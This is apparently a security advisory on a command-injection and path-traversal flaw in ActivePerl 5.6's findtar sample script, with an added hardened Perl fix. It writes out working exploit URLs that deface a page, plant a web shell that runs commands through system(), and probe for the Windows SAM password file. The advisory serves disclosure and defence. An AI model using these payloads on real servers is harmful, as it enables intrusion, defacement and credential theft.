Based on Perl 5.6, ActivePerl 5.6 is a significantly enhanced distribution, encompassing the new features available in Perl 5.6. The Windows package provides additional features to take advantage of that platform. A security problem in the product allows remote attackers to execute arbitrary commands on a remote server.
Credit:
The information has been provided by Billy Nothern.
Vulnerable systems:
ActivePerl version 5.6
If the following requirements are met:
1) The server is running ActiveState's Perl.
2) The attacker knows where Perl is located.
then it is possible for a remote attacker to cause the server to execute arbitrary commands.
Example:
http://host.example.com/."./."./Perl/eg/core/findtar+&+echo+hacked +>+c:\InetPub\wwwroot\hacked.html+&+.pl
The mentioned URL will execute C:\Perl\eg\core\findtar with arguments of:
& echo hacked > c:\InetPub\wwwroot\hacked.html & .pl
findtar is a sample that comes with ActiveState's Perl; it might also be present in other Perl distributions. There are several scripts that can be abused in this way; findtar is just an example. When findtar is executed, it uses the command line arguments in an open() call. Here is the bad line of findtar:
open(find,"/usr/bin/find $args -ls |") || die "Can't run find for you.";
Just before this, $args is set by saying:
$args = join(' ',@ARGV);
As you can see, there aren't any sanity checks on the arguments before they are passed to the open() call, so passing the arguments mentioned earlier results in the command line:
find & echo hacked > c:\InetPub\wwwroot\hacked.html & .pl -ls
being executed on the system. Now going to http://host.example.com/hacked.html will result in "hacked" being displayed.
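For contrast, here is a hardened form of that open() call. This is an added example, not code from the findtar sample or from ActiveState: it rejects any argument containing shell metacharacters or traversal segments, and it uses Perl's list-form pipe open (supported on Win32 only in modern Perl, not in 5.6) so that no shell ever parses the arguments. The names validate_args and run_find are my own.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Original findtar (vulnerable): the joined @ARGV string is handed to a shell.
#   $args = join(' ', @ARGV);
#   open(find, "/usr/bin/find $args -ls |") || die "Can't run find for you.";

# Accept only plain path-like arguments: letters, digits, dot, underscore,
# dash and forward slash. Anything else (&, |, >, ;, whitespace, ...) is refused.
# Returns an array ref on success, or an empty list on failure.
sub validate_args {
    my @argv = @_;
    my @ok;
    for my $arg (@argv) {
        return if $arg !~ m{\A[\w./-]+\z};            # shell metacharacters
        return if $arg =~ m{(?:\A|/)\.\.(?:/|\z)};    # parent-dir traversal
        push @ok, $arg;
    }
    return \@ok;
}

# Run find(1) with the validated arguments and return its output lines.
sub run_find {
    my ($find_bin, @argv) = @_;
    my $args = validate_args(@argv) or die "Refusing unsafe arguments\n";

    # List-form pipe open: each element is exactly one argv entry for find,
    # so an argument such as "& echo hacked > file" cannot become a second command.
    open(my $fh, '-|', $find_bin, @$args, '-ls')
        or die "Can't run find for you: $!\n";
    my @lines = <$fh>;
    close $fh;
    return \@lines;
}

# Stand-alone use (assumes /usr/bin/find exists; path is an assumption):
if (!caller) {
    print @{ run_find('/usr/bin/find', @ARGV) };
}
```

Passing the earlier payload (`& echo hacked > c:\InetPub\wwwroot\hacked.html & .pl`) to run_find makes validate_args refuse it before find is ever started.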
Here's an example attack:
Assuming that the wwwroot of HOST is C:\InetPub\wwwroot\
Assuming that Perl is located in C:\Perl\
http://host.example.com/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
We now have a file at http://host.example.com/cmd.pl that passes its arguments to system(). Executing commands is even easier now, and we can see the command's output. To execute "net view" we would simply call:
http://host.example.com/cmd.pl?net%20view
And the output would be returned to us. It's worth mentioning that the various parts of this exploit can be used alone.
You can get Perl to read any file you want by simply traversing to C:\ and then walking back down to its path. To see if C:\winnt\repair\sam._ exists, we would simply go to:
http://host.example.com/."./."./winnt/repair/sam._%20.pl
Perl will respond with something other than "File Not Found" if the file exists.
You could use the bad example files from ActiveState's Perl if Perl was installed anywhere under the wwwroot branch. Say we installed Perl to C:\InetPub\wwwroot\Perl\. It would be trivial to get C:\InetPub\wwwroot\Perl\eg\core\findtar to execute commands for us. This would also apply to a Unix installation.